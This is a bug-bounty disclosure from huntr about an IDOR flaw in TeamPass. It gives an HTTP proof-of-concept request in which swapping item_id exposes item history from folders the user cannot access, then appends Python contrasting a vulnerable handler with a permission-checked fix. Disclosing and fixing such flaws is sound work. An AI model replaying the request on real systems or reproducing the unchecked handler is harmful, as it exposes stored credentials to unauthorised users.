huntr report 35C899A9-40A0-4E17-BFB5-2A1430BC83C4 by tht1997
History: Apr 05, 2023 - 5:45 p.m.

Broken Access Control On Item via ID

2023-04-05 17:45:00
tht1997
www.huntr.dev
10
access control
id manipulation
information disclosure
permission control
bug bounty

EPSS

0.001

Percentile

40.7%

Description

By editing the item ID in the request (or in the HTML), I can see some information about any item via its ID.

Proof of Concept

  1. Create two accounts, each with permission on one of two folders, and set the permissions for each user.
    Example Image


Example Image

  2. Create an item with each user.
    Example Image


Example Image

  3. View the details of an item and change item_id in the view-history request:
POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 87
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 98306e16032402cd5ea3b7d8dd796e0630482672fbc73f91e2=9f1f0a5f7b487eea4da2d4c490ebe41ee75827a8f9da5b0c97; eid=2; download_started=0; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; plupload_ui_view=thumbs; teampass_session=1c25dokujscfq8aj1qvp84a3ue; jstree_select=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=load_item_history&item_id=2&key=tMV9Z62V8X2VqVPz33sFP8mUEF7psK295Fhcy5JHEnkvvuMUyC



History of the item as viewed by a user who has permission on the folder containing this item:

Example Image


History of the same item as viewed by a user who does not have permission on the folder containing this item:

Example Image
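As an added illustration (not code from this report or from TeamPass itself), the following models the history lookup the PoC abuses beside a hardened version that checks the requester's folder permission before returning anything; the users, folders, items and history entries are constructed sample data mirroring the two-user setup above.

```python
"""Model of the item-history IDOR and its fix (hypothetical data model, not TeamPass's code)."""
from dataclasses import dataclass, field


@dataclass
class Item:
    item_id: int
    folder_id: int
    history: list = field(default_factory=list)


@dataclass
class User:
    name: str
    folder_ids: set  # folders this user is allowed to read


# Constructed sample data: two users, two folders, one item in each folder.
ITEMS = {
    1: Item(1, 10, ["created by alice", "password changed"]),
    2: Item(2, 20, ["created by bob"]),
}
USERS = {"alice": User("alice", {10}), "bob": User("bob", {20})}


class Forbidden(Exception):
    pass


def load_item_history_vulnerable(user: User, item_id: int) -> list:
    """Returns history for whatever item_id the client sends; only being logged in is checked."""
    return list(ITEMS[item_id].history)


def load_item_history_fixed(user: User, item_id: int) -> list:
    """Resolves the item's folder server-side and refuses unless the caller may read that folder."""
    item = ITEMS.get(item_id)
    # Same outcome for unknown and forbidden ids, so the endpoint does not confirm which ids exist.
    if item is None or item.folder_id not in user.folder_ids:
        raise Forbidden(f"{user.name} may not view item {item_id}")
    return list(item.history)


def can_read(handler, user: User, item_id: int) -> bool:
    """True if the handler returns history, False if it refuses."""
    try:
        handler(user, item_id)
        return True
    except Forbidden:
        return False
```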
